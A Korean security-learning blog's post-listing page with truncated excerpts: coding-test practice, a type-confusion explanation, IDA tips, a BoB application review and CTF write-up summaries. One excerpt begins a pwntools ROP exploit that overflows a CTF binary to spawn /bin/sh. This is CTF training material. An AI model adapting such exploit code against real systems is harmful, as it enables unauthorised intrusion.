JiR4Vvit의 블로그

깃허브 링크 : https://github.com/jiravvit/coding-test/tree/main/baekjoon/01_IO_and_Arthimetic 코딩을 기본부터 차근차근 다시 해보고 싶어서.. 오늘부터 python3으로 백준을 풀어보기로 했다 T_T 1. 2557번 Hello World (링크) 2557번: Hello World Hello World!를 출력하시오. www.acmicpc.net print("Hello World!"); 2. 10718번 We love kriii (링크) 10718번: We love kriii ACM-ICPC 인터넷 예선, Regional, 그리고 World Finals까지 이미 2회씩 진출해버린 kriii는 미련을 버리지 못하고 왠지 모르게 올해에도 파주 W..

블로그를.. 한달 넘게 쉬어버렸다. ㅎ-ㅎ 공부를 아예 안하고 있는 것은 아니고, 요즘 공부하는 것들은 노션에 적고 있다. 비오비에서 나름 다양한 분야를 접하고 있는데, 재밌기도 하고 힘들기도 하다. 그냥.. 근황 차.. 블로그에 주절주절 한번 써봤다 ㅎ..

type confusion 취약점은 프로그램에서 사용하는 변수나 객체를 선언 혹은 초기화되었을 때와 다른 타입으로 사용할 때 발생하는 취약점이다. 1. '형변환' 자체를 잘못했을 경우에 터지는 타입 컨퓨전 (dreamhack cpp_type_confusion 문제) 2. type을 가리키는 특정한 값이 바뀌어서 다른 타입으로 처리되는 타입 컨퓨전 (pwnable.xyz child 문제)

문제 풀이 환경 : ubuntu 18.04 사용 툴 : IDA 7.5 pro 얼마 전에 면접 준비하면서 풀었는데, 롸업을 못올리고 있었다. 이 문제가 type confusion이라고 한다. 예전에 type confusion에 대해 찾아본 적이 있는데 누가 뭐냐고 물으면 그냥 단순하게 타입혼동!!! 이라고 할 것 같다 ㅎ;; 다시 찾아봐야지 ... Analysis Check Mitigation No PIE 너무 좋다. got overwriting도 된다. Execution 4번 메뉴의 rejuvenate 뜻이 젊어지게 하다. 이다. 그러면... 사람을 젊어지게 하는...? 그런 메뉴다.. 신기하다...ㅋㅋ! 6번 메뉴 evict는 퇴거시키다..라는데 사람을 퇴거시키다..? 뭐지? T_T Code 메뉴 1:..

코드 출처 : pwable.xyz child문제 1. 먼저 구조체를 찾는다. 2. malloc의 반환값을 우클릭하고 Create new struct type ...을 선택한다. 3. 그럼 아래와 같이 구조체가 자동으로 정의가 된다. 4. 변수명을 적절하게 바꿔준다. 5. 확인 버튼을 누르면 코드가 예쁘게 바뀐다!

안녕하세요 jir4vvit입니다. 제 주변 지인 분들의 도움으로 BoB 10기 취약점 분석 트랙에 최종합격 할 수 있었습니다!! 너무너무 감사합니다. 앞으로도 열심히 공부하란 뜻으로 알고 지치지않고 꾸준히 달려나가겠습니다. 10기를 준비했던 제 입장에서 9기 서류,면접 후기들은.. 너무나 큰 도움이 되었었습니다. 그래서 저도 지원했던 후기를 살짝 나눔(?)하려고 합니다. (지원요강 등은 bob 홈페이지를 참고부탁드립니다.) (또한 아래의 후기글은 10기 기준입니다.) 글을 쓰기에 앞서, 저는 취업희망자 전형으로 지원하였습니다. # 서류 준비 너무나 당연한 소리겠지만 서류에 합격해야 면접에 볼 기회가 주어집니다. 그래서 서류에 합격하려고 자기소개서와 포트폴리오 등,, 준비를 열심히 했었습니다. ## 자기소..

대회 정보 : https://ctftime.org/event/1350 대회 시간 : 2021.06.12 01:00 KST — 2021.06.14, 04:00 KST 내가 적은 롸업 : https://jiravvit.tistory.com/entry/Circle-City-Con-CTF-2021-pwnable-Baby-Fawn-CDN-%ED%92%80%EC%9D%B4-overwriting?category=902325 딱 한문제 풀었다 ㅎ.. 문제 이름 앞에 baby라고 되어 있었는데, 포너블 문제에서 flag를 이미지 파일로 알려주는 경우는 처음이라서 나한텐 완전 baby같은 느낌은 아니었다 ㅎㅎ; 그래도 금방 파일입출력을 구글링해서 코드를 찾아서 빠르게 풀 수 있었다. 함수 자체를 호출하는 것이 아니라 pt..

대회 정보 : https://ctftime.org/event/1369 대회 시간 : 2021.06.11 09:00 KST — 2021.06.14, 09:00 KST 내가 적은 롸업 : https://jiravvit.tistory.com/entry/BCACTF-20-binex-%EB%82%B4%EA%B0%80-%ED%91%BC-%EB%AC%B8%EC%A0%9C%EB%93%A4-%ED%92%80%EC%9D%B4-%ED%8F%AC%EB%84%99-%EC%98%AC%ED%81%B4-%EC%98%88%EC%95%BD%EA%B8%80-614-0930-%EA%B3%B5%EA%B0%9C 딱 포너블 영역만 다 풀었다. 취약점이 gets로 시작해서 gets로 끝났다 ㅎㅎ; 자꾸 뭔가.. 간단한 걸 놓치는 기분이다. 특히 ..

문제 풀이 환경 : ubuntu 18.04 사용 툴 : IDA 7.5 pro Pwn Babyrop (94 point, 59 solves) rop ? rtl ? 대놓고 BOF가 터진다. secret_func에서 execve 함수를 사용해준다. 그래서 굳이 libc leak할 필요가 없다. 0x402204 + 22 = 0x40201a from pwn import * p = process('./babyrop') e = ELF('./babyrop') pop_rdi = 0x4012c3 pop_rsi_r15 = 0x4012c1 payload = '' payload += 'A' * 0x28 payload += p64(pop_rdi) payload += p64(0x40201a) # /bin/sh payload += p..

대회 정보 : https://ctftime.org/event/1381 대회 시간 : 2021.06.12 16:00 KST — 2021.06.13, 23:00 KST 내가 적은 롸업 : https://jiravvit.tistory.com/entry/THC-CTF-2021-%EB%82%B4%EA%B0%80-%ED%91%BC-%EB%AC%B8%EC%A0%9C%EB%93%A4-%ED%92%80%EC%9D%B4?category=902325 되게 열심히 했다. 포너블 첫문제를 4등했다 ㅎㅎ; ㅋㅋㅋㅋㅋ 그런데 조금만 생각을 빠릿빠릿하게 했으면 진짜 퍼블도 했었을 수도 있는 문제였다.ㅎ .. 하지만 마음이 급해서 바보같이 풀었었다. execve함수도 있고 /bin/sh 문자열도 있는데 굳이 libc leak해서 진심..